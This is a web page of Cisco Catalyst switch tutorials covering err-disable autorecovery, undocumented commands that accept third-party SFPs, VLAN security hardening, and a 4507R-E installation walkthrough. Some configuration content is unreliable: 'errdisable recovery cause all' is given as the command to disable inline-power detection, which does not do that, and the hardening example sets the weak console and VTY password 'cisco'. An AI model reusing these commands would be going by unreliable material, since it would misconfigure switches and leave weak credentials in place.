Skip to main content

Cisco Catalyst Err-disabled Port State, Enable & Disable Autorecovery Feature

cisco-switches-4507re-ws-x45-sup7l-e-20Errdisable is a feature that automatically disables a port on a Cisco Catalyst switch. When a port is error disabled, it is effectively shut down and no traffic is sent or received on that port.

The error disabled  feature is supported on most Catalyst switches running the Cisco IOS software. Including all the following models:

  • Catalyst 2940 / 2950 / 2960 / 2960S
  • Catalyst 3550 / 3560 / 3560-E / 3750 / 3750-E
  • Catalyst 4000 / 4500 / 4507R
  • Catalyst 6000 / 6500

 The Errdisable error disable feature was designed to inform the administrator when there is a port problem or error.  The reasons a catalyst switch can go into Errdisable mode and shutdown a port are many and include:

  • Duplex Mismatch
  • Loopback Error
  • Link Flapping (up/down)
  • Port Security Violation
  • Unicast Flodding
  • UDLD Failure
  • Broadcast Storms
  • BPDU Guard

When a port is in error-disabled state, it is effectively shut down and no traffic is sent or received on that port. The port LED is set to the orange color and, when you issue the show interfaces command, the port status shows as Errdisabled.

Following is an example of what an error-disabled port looks like:

2960G# show interface gigabit0/7
GigabitEthernet0/7 is down, line protocol is down (err-disabled)
  Hardware is Gigabit Ethernet, address is 001b.54aa.c107 (bia 001b.54aa.c107)
  MTU 1500 bytes, BW 100000 Kbit, DLY 100 usec,
     reliability 234/255, txload 1/255, rxload 1/255
  Encapsulation ARPA, loopback not set
  Keepalive set (10 sec)
  Auto-duplex, Auto-speed, media type is 10/100/1000BaseTX
  input flow-control is off, output flow-control is unsupported
  ARP type: ARPA, ARP Timeout 04:00:00
  Last input 18w5d, output 18w5d, output hang never
  Last clearing of "show interface" counters never
  Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
  Queueing strategy: fifo
  Output queue: 0/40 (size/max)
  5 minute input rate 0 bits/sec, 0 packets/sec
  5 minute output rate 0 bits/sec, 0 packets/sec
     1011 packets input, 862666 bytes, 0 no buffer
     Received 157 broadcasts (0 multicast)
     0 runts, 0 giants, 0 throttles
     3021 input errors, 2 CRC, 0 frame, 0 overrun, 0 ignored
     0 watchdog, 144 multicast, 0 pause input
     0 input packets with dribble condition detected
     402154 packets output, 86290866 bytes, 0 underruns
     0 output errors, 0 collisions, 1 interface resets
     0 babbles, 0 late collision, 0 deferred
     0 lost carrier, 0 no carrier, 0 PAUSE output
     0 output buffer failures, 0 output buffers swapped out

To recover a port that is in an Errdisable state, manual intervention is required, and the administrator must access the switch and configure the specific port with 'shutdown' followed by the 'no shutdown' command. This command sequence will enable the port again, however, if the problem persists expect to find the port in Errdisable state again soon.

Understanding And Configuring Errdisable AutoRecovery

As outlined above, there are a number of reasons a port can enter the Errdisable state.  One common reason is the Port Security error, also used in our example below.

Of all the errors, Port Security is more a feature rather than an error. Port Security allows the restriction of MAC Addresses on an interface configured as a layer 2 port. This effectively prevents others connecting unwanted hubs or switches on the network. Port Security allows us to specify a single MAC Address to be connected to a specific port, thus restricting access to a specific computer.

In the case of a violation, Port Security will automatically disable the port. This is the behaviour of the default port security policy when enabling Port Security. Following is a configuration example of port security:

2960G(config)# interface GigabitEthernet0/48
2960G(config-if)# switchport access vlan 2
2960G(config-if)# switchport mode access
2960G(config-if)# switchport port-security
2960G(config-if)# spanning-tree portfast

Once a host is connected to the port, we can get more information on its port-security status and actions that will be taken when a violation occurs:

2960G# show port-security interface GigabitEthernet 0/48
Port Security         : Enabled
Port Status           : Secure-up
Violation Mode        : Shutdown
Aging Time            : 0 mins
Aging Type            : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses   : 1
Total MAC Addresses     : 1
Configured MAC Addresses: 0
Sticky MAC Addresses    : 0
Last Source Address:Vlan: 001b.54aa.c107
Security Violation Count: 0

Note that the Violation Mode is set to Shutdown. This means that when a violation is detected, the switch will place gigabitethernet 0/48 in the err-disable shutdown state as shown below:

%PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address 0031.f6ac.03f5 on port GigabitEthernet0/48

While it's almost always necessary to know when a port security violation occurs there are some circumstances where autorecovery is a desirable feature, especially durng accidental violations.

The following commands enable the autorecovery feature 30 seconds after a port security violation:

2960G(config)# errdisable recovery cause psecure-violation
2960G(config)# errdisable recovery interval 30

Determine The Reason For The Errdisabled State

To view the Errdisabled reasons, and see for which reason the autorecovery feature has been enabled, use the show Errdisable recovery command:

2960G# show errdisable recovery
ErrDisable Reason  Timer Status
-----------------  --------------
udld                Disabled
bpduguard           Disabled
security-violatio   Disabled
channel-misconfig   Disabled
vmps                Disabled
pagp-flap           Disabled
dtp-flap            Disabled
link-flap           Disabled
secure-violation    Enabled
sfp-config-mismat   Disabled
gbic-invalid        Disabled
dhcp-rate-limit     Disabled
unicast-flood       Disabled
storm-control       Disabled
loopback            Disabled
Timer interval: 30 seconds
Interfaces that will be enabled at the next timeout.

We have now confirmed that autorecovery is enabled for port-security violations. If it is required to enable the Errdisable autorecovery feature for all supported reasons, use the following command:

2960G(config)# errdisable recovery cause all

To test our configuration we forced a port security violation, causing the switch to place the offending port in the shutdown state. Notice we've enabled autorecovery for all Errdisable reasons and the time left to enable the interfaces placed in shutdown state by the port security violation:

2960G# show errdisable recovery
ErrDisable Reason  Timer Status
-----------------  --------------
udld                Enabled
bpduguard           Enabled
security-violatio   Enabled
channel-misconfig   Enabled
vmps                Enabled
pagp-flap           Enabled
dtp-flap            Enabled
link-flap           Enabled
psecure-violation   Enabled
sfp-config-mismat   Enabled
gbic-invalid        Enabled
dhcp-rate-limit     Enabled
unicast-flood       Enabled
storm-control       Enabled
loopback            Enabled

Timer interval: 30 seconds

Interfaces that will be enabled at the next timeout:

Interface  Errdisable reason   Time left(sec)
---------  -----------------  --------------
Gi0/48    security-violation        17

Seventeen seconds later, the switch automatically recovered from the port security violation and re-enabled the interface:

%PM-4-ERR_RECOVER: Attempting to recover from secure-violation err-disable state on gigabitethernet0/48
18w4d: %LINK-3-UPDOWN: Interface GigabitEthernet0/48, changed state to up
18w4d: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/48, changed state to up

Disabling The Errdisable Feature

There are cases where it might be necessary to disable the Errdisable mechanism for specific supported features in order to overcome constant interface shutdowns and auto recoveries.  While the Catalyst IOS does not allow disabling all features we can still fine-tune the mechanism and selectively disable a few.

To view the Errdisable reasons monitored by the switch, use the show Errdisable detect command:

2960G# show errdisable detect

ErrDisable Reason      Detection    Mode
-----------------      ---------    ----
bpduguard               Enabled      port
channel-misconfig       Enabled      port
community-limit         Enabled      port
dhcp-rate-limit         Enabled      port
dtp-flap                Enabled      port
gbic-invalid            Enabled      port
inline-power            Enabled      port
invalid-policy          Enabled      port
link-flap               Enabled      port
loopback                Enabled      port
lsgroup                 Enabled      port
mac-limit               Enabled      port
pagp-flap               Enabled      port
port-mode-failure       Enabled      port
secure-violation        Enabled      port/vlan
security-violation      Enabled      port
sfp-config-mismatch     Enabled      port
small-frame             Enabled      port
storm-control           Enabled      port
udld                    Enabled      port
vmps                    Enabled      port


As shown, the command lists all supported Errdisable reasons.  For our example, let's assume we want to disable the inline-power Errdisable feature.

To achieve this, we simply use the following command:

2960G(config)# errdisable recovery cause all

And verify that Errdisable has been disabled for the feature:

2960G# show errdisable detect
ErrDisable Reason      Detection    Mode
-----------------      ---------    ----
bpduguard               Enabled      port
channel-misconfig       Enabled      port
community-limit         Enabled      port
dhcp-rate-limit         Enabled      port
dtp-flap                Enabled      port
gbic-invalid            Enabled      port
inline-power            Disabled     port
invalid-policy          Enabled      port
link-flap               Enabled      port
loopback                Enabled      port
lsgroup                 Enabled      port
mac-limit               Enabled      port
pagp-flap               Enabled      port
port-mode-failure       Enabled      port
psecure-violation       Enabled      port/vlan
security-violation      Enabled      port
sfp-config-mismatch     Enabled      port
small-frame             Enabled      port
storm-control           Enabled      port
udld                    Enabled      port
vmps                    Enabled      port

Overall, the Errdisable feature is an extremely useful tool if configured and monitored correctly. Take the necessary time to play around with the supported options of your Cisco Catalyst switch and fine-tune it to suit your network needs.

  • Hits: 387924

Forcing A Cisco Catalyst Switch To Use 3rd Party SFP Modules

cisco-switches-3rd-party-sfp-1Many companies are seeking for Cisco SFP alternatives to help cut down the costs on these expensive modules.

A frequent customer problem with Cisco's new line of Catalyst switches is that they do not support 3rd party (non-Cisco) SFPs - or at least they do not seem to...

If you've just replaced your network switches and tried using any 3rd party SFPs to connect your network backbone, you'll quickly stumble across an error similar to the following:

%PHY-4-UNSUPPORTED_TRANSCEIVER: Unsupported transceiver found in Gi1/0/0
%GBIC_SECURITY_CRYPT-4-VN_DATA_CRC_ERROR: GBIC in port 65538 has bad crc

Congratulations!  The Catalyst switch has just disabled the GBIC port! This happens because Cisco Catalyst switches are configured by default not to work with non-Cisco SFPs.

When a SFP is inserted into a switch's GBIC port, the switch immediately reads a number of values from the SFP and if it doesn't like what it sees, it throws the above error message and disables the port.

All SFP modules contain a number of recorded values in their EEPROM and include:

  • Vendor Name
  • Vendor ID
  • Serial Number
  • Security Code
  • CRC

How To Force Your Cisco Switch To Use 3rd Party SFPs

Despite the error displayed, which leaves no hope for a solution, keep smiling as you're about to be given one.

There are two undocumented commands which can be used to force the Cisco Catalyst switch to enable the GBIC port and use the 3rd party SFP:

3750G-Stack(config)# service unsupported-transceiver

Warning: When Cisco determines that a fault or defect can be traced to
the use of third-party transceivers installed by a customer or reseller,
then, at Cisco's discretion, Cisco may withhold support under warranty or
a Cisco support program. In the course of providing support for a Cisco
networking product Cisco may require that the end user install Cisco
transceivers if Cisco determines that removing third-party parts will
assist Cisco in diagnosing the cause of a support issue.

3750G-Stack(config)# no errdisable detect cause gbic-invalid

When entering the service unsupported-transceiver command, the switch will automatically throw a warning message as a last hope to prevent the usage of a 3rd party SFP.

The no errdisable detect cause gbic-invalid command will help ensure the GBIC port is not disabled when inserting an invalid GIBC.

Since the service unsupported-transceiver  is undocumented, if you try searching for the command with the usual method (?), you won't find it:

3750G-Stack(config)# service ?
compress-config           Compress the configuration file
  config                  TFTP load config files
  counters                Control aging of interface counters
  dhcp                    Enable DHCP server and relay agent
  disable-ip-fast-frag    Disable IP particle-based fast fragmentation
  exec-callback           Enable exec callback
  exec-wait               Delay EXEC startup on noisy lines
  finger                  Allow responses to finger requests
  hide-telnet-addresses   Hide destination addresses in telnet command
  linenumber              enable line number banner for each exec
  nagle                   Enable Nagle's congestion control algorithm
  old-slip-prompts        Allow old scripts to operate with slip/ppp
  pad                     Enable PAD commands
  password-encryption     Encrypt system passwords
  password-recovery       Disable password recovery
  prompt                  Enable mode specific prompt
  pt-vty-logging          Log significant VTY-Async events
  sequence-numbers        Stamp logger messages with a sequence number
  slave-log               Enable log capability of slave IPs
  tcp-keepalives-in       Generate keepalives on idle incoming network connections
  tcp-keepalives-out      Generate keepalives on idle outgoing network connections
  tcp-small-servers       Enable small TCP servers (e.g., ECHO)
  telnet-zeroidle         Set TCP window 0 when connection is idle
  timestamps              Timestamp debug/log messages
  udp-small-servers       Enable small UDP servers (e.g., ECHO)

3750G-Stack(config)# service

The same applies for the no errdisable detect cause gbic-invalid command.

We tried both service unsupported-transceiver & no errdisable detect cause gbic-invalid commands on 2960G, 3560G, 3750G, 4507R and 4507R-E Catalyst switches and all accepted the commands without a problem. In fact if the Catalyst switch is running IOS 12.2(25)SE and above, the undocumented commands are available.

Should 3rd Party SFPs Be Used?

There are mixed feelings about this. We certainly do not recommend using non-Cisco SFP's in production environments, however in a lab environment, its most probably a cheap way out.

When using 3rd party GBICs, one must keep in mind that Cisco TAC will not provide any support for problems related to the SFPs as they are totally unsupported. Here is a small portion from the Cisco Catalyst 3750G Q&A that refers to the usage of 3rd party SFP modules on the switch:

Q. Do the Cisco Catalyst 3750 Series Switches interoperate with SFPs from other vendors?

A. Yes, starting from 12.2(25)SE release, the user has the option via CLI to turn on the support for 3rd party SFPs. However, the Cisco TAC will not support such 3rd party SFPs. In the event of any link error involving such 3rd party SFPs the customer will have to replace 3rd party SFPs with Cisco SFPs before any troubleshooting can be done by TAC.
  • Hits: 406691

VLAN Security Tips - Best Practices

cisco-switches-vlan-security-1This article focuses on VLAN Security and its implementation within the business network environment. We provide tips and Cisco CLI commands that will help you upgrade your VLAN network security.

Even though many Administrators and IT Managers are aware of VLAN technologies and concepts, unfortunately, it has been proven that the same does not apply when it comes to VLAN Security. While this section mainly focuses on security implemented on Cisco switches, many of the concepts can be applied on other vendor switches.

The first principle in securing a VLAN network is physical security. If you do not want your devices to be tampered with, physical access to the device must be strictly controlled.  Core switches are usually safely located in a datacenter with restricted access, however edge switches are not that lucky and are usually placed in areas where they are left exposed.

Just as physical security guidelines require equipment to be in a controlled space, VLAN-based security requires the usage of special tools and following a few ‘best security practices’ to give the desired result.

Let’s take a look at a few important steps an Administrator or IT Manager can take, to strip their network from the security problems most networks suffer today.

Removal of Console-port Cables, Introduction of Password-Protected Console/Vty Access with Specified Timeouts and Restricted Access

Console ports on the back side of Cisco switches provide direct access to the system. If no care is taken to secure this access method, then the switch might remain fully exposed to anyone with the popular ‘blue console cable’. Configuration of complex user credentials on the console and telnet/ssh ports will ensure any unwanted visitor will remain in the dark when trying to access the device.  Using special commands such as the ‘exec-timeout’ commands,  when the Administrator accidently forgets to logout of the session, it will automatically timeout after the programmed timeout value.

Following is a set of commands that will help you accomplish the above measures to help restrict access to the swich:

Switch# configure terminal
Switch(config)# username admin privilege 15 secret *Firewall.cx*
Switch(config)# line console 0
Switch(config-line)# login local
Switch(config-line)# password cisco
Switch(config-line)# exec-timeout 60 0

We also apply the same commands to our VTY (telnet/ssh) section and create an access-list 115 to restrict telnet/ssh access from specific networks & hosts:

Switch (config)# line vty 0 15
Switch (config-line)# password cisco
Switch (config-line)# login local
Switch (config-line)# exec-timeout 60 0
Switch (config-line)# transport preferred ssh 
Switch (config-line)# access-class 115 in
Following is the access-list 115 we created:
Switch (config)# access-list 115 remark -=[Restrict VTY Access]=-
Switch (config)# access-list 115 permit ip host 74.200.84.4 any
Switch (config)# access-list 115 permit ip host 69.65.126.42 any
Switch (config)# access-list 115 permit ip 192.168.50.0 0.0.0.255 any
Switch (config)# access-list 115 remark

Always ensure the use of the ‘secret’ parameter rather than the ‘password’ parameter in your username syntax, when defining usernames and their passwords. The classic ‘password’ parameter uses a much weaker encryption algorithm that is easily unencrypted.

To demonstrate this, you can use the 'password' parameter and then copy past the encrypted password into our popular Cisco Type 7 Password decrypt page and see what happens!

Avoid Using VLAN1 (Default VLAN)  for your Network Data

VLAN 1 is a special VLAN selected by design to carry specific information such as CDP (Cisco Discovery Protocol), VTP, PAgP and more.  VLAN 1 was never intended to be used as standard VLAN to carry network data.

By default configuration, any Access Link on a Cisco switch is set to VLAN 1, causing a major security issue as direct access to the network backbone is given.  As a consequence, VLAN 1 can end up unwisely spanning the entire network if not appropriately pruned.

The practice of using a potentially omnipresent VLAN for management purposes puts trusted devices to higher risk of security attacks from untrusted devices that by misconfiguration or pure accident gain access to VLAN 1 and try to exploit this unexpected security hole.

As a general rule of thumb, the network Administrator should prune any VLAN, and in particular VLAN 1 from all ports where that VLAN is not needed.

The following example prunes VLANs 1  to 5 and 7 to 8, allowing access only to VLAN 6 when in trunking mode. Furthermore, we assign the port to VLAN 6 only:

Switch(config)# interface fastethernet0/24
Switch(config-if)# switchport trunk allowed vlan remove ? (help)
WORD  VLAN IDs of disallowed VLANS when this port is in trunking mode


Switch(config-if)# switchport trunk allowed vlan remove 1,2,3,4,5,7,8
Switch(config-if)# switchport access vlan 6

Disable High-Risk Protocols on Switchports

If a port is connected to a ‘foreign’ device, don’t try to speak its language – it could be turned to someone else’s advantage and used against your network. Ensure you disable protocols such as CDP, DTP, PAgP, UDLD (Unidirectional Link Detection Protocol)  and always enable spanning-tree  portfast & bpduguard on the port.

Here is an example on how to disable the above mentioned protocols and enable spanning-tree portfast bpduguard:

Switch(config)# interface fastethernet0/24
Switch(config-if)# no cdp enable
Switch(config-if)# no udld port
Switch(config-if)# spanning-tree portfast
Switch(config-if)# spanning-tree bpduguard enable
Switch(config-if)# spanning-tree guard root

Finally, if the port is not to be used, issue the ‘shutdown’ command to ensure it won’t be accessed by anyone without the proper authorization.

VTP Domain, VTP Pruning and Password Protection

Two choices exists here – either configure the VTP domain appropriately or turn off VTP altogether!  VTP is a great tool that ensures all VLAN information is carried to your network switches. If necessary security measures are not taken, wiping your network-wide VLAN configuration is as easy as connecting a switch with the ‘proper’ devastating configuration.

 A switch configured with the same ‘VTP domain’, a role type of ‘Server’ and a higher ‘VTP revision’ number of the real VTP server (usually the core switch), is all that’s required to cause major disruption and panic across any network size. All other switches will automatically ‘listen’ to the new ‘VTP Server’ and wipe all existing VLAN information. You can then start looking for a new job.

A few simple self-explanatory commands on your core switch will help ensure the above scenario is avoided:

CoreSwitch(config)# vtp domain firewall.cx
CoreSwitch(config)# vtp password fedmag secret
CoreSwitch(config)# vtp mode server
CoreSwitch(config)# vtp version 2
CoreSwitch(config)# vtp pruning

Edge switches will require the ‘vtp mode client’ and ‘vtp password’ command, after which they will automatically receive all necessary VLAN information from your core switch.

You can verify the configuration using the ‘show vtp status’ command:

CoreSwitch # show vtp status
VTP Version capable           : 1 to 3
VTP version running           : 2
VTP Domain Name               : firewall.cx
VTP Pruning Mode              : Enabled
VTP Traps Generation          : Disabled
Device ID                     : c062.6b10.5600
Configuration last modified by 192.168.50.1 at 3-16-11 16:53:48
Local updater ID is 192.168.50.1 on interface Vl1 (lowest numbered VLAN interface found)

Feature VLAN:
--------------
VTP Operating Mode               : Server
Maximum VLANs supported locally  : 1005
Number of existing VLANs         : 8
Configuration Revision           : 25
MD5 digest                       : 0xDD 0x9D 0x3B 0xA0 0x80 0xD8 0x7A 0x3A
                                   0x1F 0x2F 0x2A 0xDB 0xCD 0x84 0xCE 0x5F

Control Inter-VLAN Routing Using IP Access Lists

Inter-VLAN routing is a great and necessary feature. Because in many cases there is the need to isolate VLANs or restrict access between them, the usage of IP Access lists is mandatory.

IP Access lists should be created in such a way, that they allow the normal flow of traffic between VLANs, but do not expose the networks that need to be protected. Once the Access Lists are created, they are applied directly on the VLAN interface of the core layer-3 switch.   All traffic from the designated VLAN trying to pass to other VLANs will be denied according to the Access Lists, making sure the core network is not exposed. 

Let’s take a common example to make this tip more practical.

You’ve created a new guest VLAN (VLAN 6 – Network 192.168.141.0/24) to provide free Internet access to your company visitors. The requirement is to allow full Internet access, but restrict access to other VLANs.  In addition, configuration of a DHCP server is also deemed necessary, to make your life easier and less troublesome.

Here’s the configuration used for the DHCP server serving this VLAN:

CoreSwitch(config)# ip dhcp pool vlan6-Guest-Internet 
CoreSwitch(dhcp-config)# network 192.168.141.0 255.255.255.0
CoreSwitch(dhcp-config)# dns-server 192.168.130.5
CoreSwitch(dhcp-config)#  default-router 192.168.141.1

Note that 192.168.141.1 is our core switch VLAN 6 IP Address, and 192.168.130.5 is our DNS server located on a different VLAN.

Next, we create our necessary Access Lists.

CoreSwitch(config)# access-list 100 remark --[Allow Guest DNS requests to DNS Server]--
CoreSwitch(config)# access-list 100 permit udp 192.168.141.0 0.0.0.255 host 192.168.130.5 eq 53
CoreSwitch(config)# access-list 100 remark [Necessary for DHCP Server to receive Client requests]
CoreSwitch(config)# access-list 100 permit udp any any eq bootps
CoreSwitch(config)# access-list 100 permit udp any any eq bootpc
CoreSwitch(config)# access-list 100 remark --[Deny Guest Access to other VLANs]--
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.50.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.130.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.135.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.160.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.131.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.170.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.180.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 remark --[Permit Guest Access to everywhere else –Internet ]--
CoreSwitch(config)# access-list 100 permit ip 192.168.141.0 0.0.0.255 any
CoreSwitch(config)# access-list 100 remark

Notice that we permit DNS and DHCP requests initially, and then deny access to all VLANs. Finally we permit access everywhere else. This logical structure of our Access List is built to comply with the Top-Down Access List examination performed by the Core switch.

If we were to place the DNS or Bootp last in the Access List, it would clearly fail as the deny statements would prevail.  Finally, the ‘log’ parameter seen on our deny statements would trigger a log entry on our core switch, allowing us to catch any guests trying persistently to access our other VLANs

Last step would be to apply the access-list to the newly created VLAN interface, in the ‘incoming’ direction:

CoreSwitch(config)# interface vlan 6
CoreSwitch (config-if)# ip access-group 100 in

Summary

VLAN Technology is wonderful – it offers great enhancements to the network and provides paths to run multiple services in isolated environments without sacrificing speed, quality and network availability. If the necessary basic security guidelines are taken in consideration during its initial implementation and ongoing administration, it can perform wonders and dramatically reduce the administrative overhead from your IT Administrators or Managers. On other hand, if these security guidelines are ignored, the imminent exposure of the whole network is at risk and simply a matter of time.

Perhaps the most serious mistake that an IT Administrator or Manager can make, is to underestimate the importance of the DataLink layer, and of VLANs in particular, in the architecture of switched networks. It should not be forgotten that any network is only as robust as its weakest link, and that therefore an equal amount of attention should be given to any of its layers, to make sure that its entire structure is sound.

  • Hits: 204994

Installation of a Cisco Catalyst 4507R-E Layer 3 Switch

Driven by our thirst for technical material and experience, we thought it would be a great idea to start presenting various installations of Cisco equipment around the globe, especially equipment that we don't get to play with everyday.

We recently had the chance to unpack and install a Cisco Catalyst 4507R-E Layer 3 switch, which we must admit was extremely impressive. The Cisco Catalyst series is world-known for its superior network performance and modularity that allows it to 'adapt' to any demands your network might have.

For those who haven't seen or worked with a 4507R/4507R-E switch, it's a very big and heavy switch in a metal cabinet (chassis) supporting up to two large power supplies and a total of 7 cards (modules), two of which are the supervisor engines that do all the switching and management work.

The new 4507R-E series is a mammoth switch that allows a maximum of 320Gbps (full duplex) switching capacity by utilising all 7 slots, in other words 5 modules alongside with two Supervisor Engine 6-E cards (with two full line rate 10Gb Uplinks).

The 4507R-E switch is shipped in a fairly large box 50(H)x44(W)x32(D) cm and weights around 21 Kgrs with its shipping box. The practical height of the unit for a rack is 11U which means you need quite a bit of room to make sure it's comfortably placed.

Unboxing the Cisco Catalyst 4507R

Like most Cisco engineers, we couldn't wait to open the heavy box and smell the freshly packaged item that came directly from Cisco's manufacturing line. We carefully moved the 4507R-E box to the datacenter and opened the top side of the box.....

tk-cisco-switches-install-4507r-1

The upper area of the picture is where you'll find the two large cube slots for the power supplies. Below them, you can identify 6 out of the 7 slots waiting to be populated and give this monster unbelievable functionality!

After opening the package and removing the plastic wrapping, we placed the switch on the floor so we could take a better look at it.

Because we couldn't wait any longer, we quickly opened one of two power supplies and inserted it into the designated slot. The power supplies installed were rated at 2800Watts each - providing more than enough juice to power a significant number of IP Phones via the PoE cards installed later on.

The picture below shows both power supplies, one inserted into its slot, while the other was placed on top of the chassis with its connectors facing frontwards so you can get a glimpse of them. When inserted into its slot, the power supply's bottom connectors plug firmly into the chassis connectors and power up the Catalyst switch:

tk-cisco-switches-install-4507r-2

Turning on the power supplies for the first time made the datacenter's light dim instantantly as they began to draw power for the first time! Interestingly enough, if you take a look at the power supply on top of the chassis, you'll notice three long white strips inside the power supply. These are actually three very large electrolytic capacitors - quite impressive!

For those interested, the power supplies were made by Sony (yes, they had a Sony sticker on them!).

Supervisor Engine Line Card Installation

As we mentioned in the beginning of this article, the powering engine of any 4500 series Catalyst switch is the Supervisor Engine. The Supervisor engines occupy up to two slots on the 4507R chassis, one of them used for redundancy in case the other fails. When working with two supervisor engines, the 4507R is usually configured to automatically switch from one engine to the other without network interruptions, even for a VoIP network with active calls between ends.

Cisco currently has around 7 different Supervisor Engines, each with unique characteristics, designed for various levels of density and bandwidth requirements.

Currently, the Supervisor Engine 6-E is the best performing engine available, providing 320Gbps bandwidth (full duplex) and 250 million packets per second forwarding rate!

Our users can refer to our popular Cisco Catalyst 4500 Series Zero-Downtime IOS Upgrade Process for Supervisor Engine 7-E, 7L-E, 6L-E and V-10GE Redundant Configurations article to learn how to upgrade their Supervisor Engine without network service interruption.

For our installation, we worked with the Supervisor Engine II-Plus, also known as Cisco part WS-X4013+. Here's one of the supervisor engines in its original antistatic bag:

tk-cisco-switches-install-4507r-3

After placing on my wrist the antistatic wrist-strap contained in the package and carefully unwrapping the supervisor engine, the green circuit-board with its black towers (heatsinks) is revealed. You can easily see the 5 heatsinks, two of which are quite large and do an excellent job in keeping the processors cool:

tk-cisco-switches-install-4507r-4

At the back left side of the board, you can see the supervisor engine's connector which is equally impressive with 450 pin connectors - 50 on each row!

We took a picture from the back of the board to make sure the connector was clearly visible:

tk-cisco-switches-install-4507r-5

Just looking at the connector makes you imagine the number of signals that pass through it to give the 4507R-E the performance rating it has! On the left of the board's connector is the engine's RAM (256MB), while right behind it is the main CPU with the large heatsink, running at 266Mhz.

Here is a close up of the engine's RAM module. The existing 256MB memory module can be removed and upgraded according to your requirements:

tk-cisco-switches-install-4507r-5a

Moving to the front side of the Supervisor Engine, you can see the part number and description:

tk-cisco-switches-install-4507r-6

The uplink ports visible on the front are GBIC (GigaBit Interface Converter) that can be used as normal Gigabit interfaces. By using different GBIC's you can connect multimode, singlemode fiber optic cable or standard CAT5e/CAT6 Ethernet cabling. These ports can come in handy when you're approaching your switch's full capacity.

The impressive Supervisor Engine fits right into one of the two dedicated slots available on the 4507R-E chassis. These are slots 3 & 4 as shown in the picture below. Also visible is the switch's backplane and black connectors awaiting the Supervisor Engine boards (marked with red):

tk-cisco-switches-install-4507r-7

We took another picture inside the chassis to make things as clear as possible:

tk-cisco-switches-install-4507r-8

Here you can see the backplane with the two Supervisor Engine connectors. The white coloured connectors just above and below the Supervisor Engines are used by the rest of the boards available to the 4507R.

After inserting one of the Supervisor Engines and two power supplies, here is the result:

tk-cisco-switches-install-4507r-9

One detail well worth noticing is the colour coded bars on the left and right side of the Supervisor card. These colour codes exist to ensure engineers don't accidently try to insert a Supervisor card into an inappropriate slot. The 4507R-E can accept upto two supervisor engines, therefore you have two slots dedicated to them, leaving 5 slots available.

Cisco engineers have thought of everything on the 4507R-E. The cooling mechanisim is a good example of smart-thinking and intelligent engineering. With 7 cards installed on the system, pumping a generous amount of heat, the cooling had to be as effective as possible. Any heat captured between the cards could inadvertably lower the components' reliability and cause damage in the long term.

This challenge was dealt with by placing a fan-tray right next to the cards in a vertical direction. The fan-tray is not easily noticed when taking a quick glance, but the available handle on the front gives away that something is hidden in there. Unscrew the top & bottom bolts, place your hand firmly around the handle and pulling outwards will suprise you:

tk-cisco-switches-install-4507r-10

 The picture taken on the left shows the eight fans placed on the fan-tray. These fans work full speed the moment you power the switch on, consuming 140Watts alone!

Once they start spinning, you really can't argue that the cooling is inadequate, as the air flow produced is so great that when we powered the 4507R-E, the antistatic bags accidently forgotten on the right hand side of the chassis were sucked almost immediately against the chassis grip, just at it happens when you leave a plastic bag behind a powerful fan!

Of course, anything on the left side of the chassis (vieweable in our picture) would be immediately blown away.

After inserting the fan-tray back in place, it was time to take a look around and see what else what left to play with.

Our eyes caught another Cisco box and we approached it, picked it up and checked out the label:

tk-cisco-switches-install-4507r-11

The product number WS-X4548-GB-RJ45V and size of the package made it clear we were looking at a card designated for the 4507R-E. Opening the package confirmed our thoughts - this was a 48port Gigabit card with PoE support:

tk-cisco-switches-install-4507r-12

We carefully unwrapped the contents always using our antistatic wrist-strap so that we don't damage the card, and then placed it on top of its box:

tk-cisco-switches-install-4507r-13

The card has an impressive quantity of heatsinks, two of which are quite large and therefore must generate a lot of heat. The backplane connector is visible with its white colour (back left corner), and right behind the 48 ports is an area covered with a metallic housing. This attracted our attention as we thought something very senstive must be in that area for Cisco to protect it in such a way.

Taking a look under the protective shield we found a PCB board that ran along the length of the board:

tk-cisco-switches-install-4507r-14

Our understanding is that this rail of PCB with transistors and other electrical circuits mounted on it seemed to be regulators for the PoE support. Taking into consideration that we didn't see the same protection in other similar non-PoE boards, we couldn't image it being something else.

When we completed our checkup, we decided it was time to install the card and finally power the 4507R-E switch.

tk-cisco-switches-install-4507r-15

The picture on the left shows our 4507R-E installed with two Supervisor Engine II-Plus engines in active-standby redundancy mode and one 48 port Gigabit Ethernet card with PoE support.

On top is the editor's (Chris Partsenidis) laptop with a familair website loaded, Firewall.cx!

Configuring the Supervisor engines was a simple task. When the 4507R-E is powered on, both engines will boot by first performing a POST test on their modules, memory buffers etc. When this internal POST phase is successfully complete without errors, the engines begin to boot the IOS.

 

 

 

The screenshot below shows us the described procedure from one Supervisor engine since you can't monitor both engines unless you have one serial port connected to each supervisor's console port:

tk-cisco-switches-install-4507r-16

As shown above, the Supervisor engine passed all tests and then proceeded to boot the IOS.

Once loaded, the IOS will check for the existence of a second Supervisor engine, establish connection with it and, depending on which slot it is located in, it will automatically initialise the second engine in standby mode as shown below:

tk-cisco-switches-install-4507r-17

 Once the Supervisor engine bootup process is complete, you are able to configure any aspect of the switch according to your needs, just as you would with any other Cisco Catalyst switch. The interesting part is when you try to save your configuration:

tk-cisco-switches-install-4507r-18

In the above screenshot, we've configured the switch to boot using a specific IOS located in the bootflash, as soon as we saved the configuration using the wr command, the Supervisor engine automatically synchronised the two engines' nvram without any additional commands. This excellent functionality makes sure that whatever configuration is applied to the active Supervisor engine will be available to the standby engine should the first one fail.

The great part of this switch is that you can obtain any type of information you require from it. For example, we switched off one of the two power supplies and executed the show modules command. This command gives a report of the installed modules (cards) in the catalyst switch along with a few more details:

tk-cisco-switches-install-4507r-19

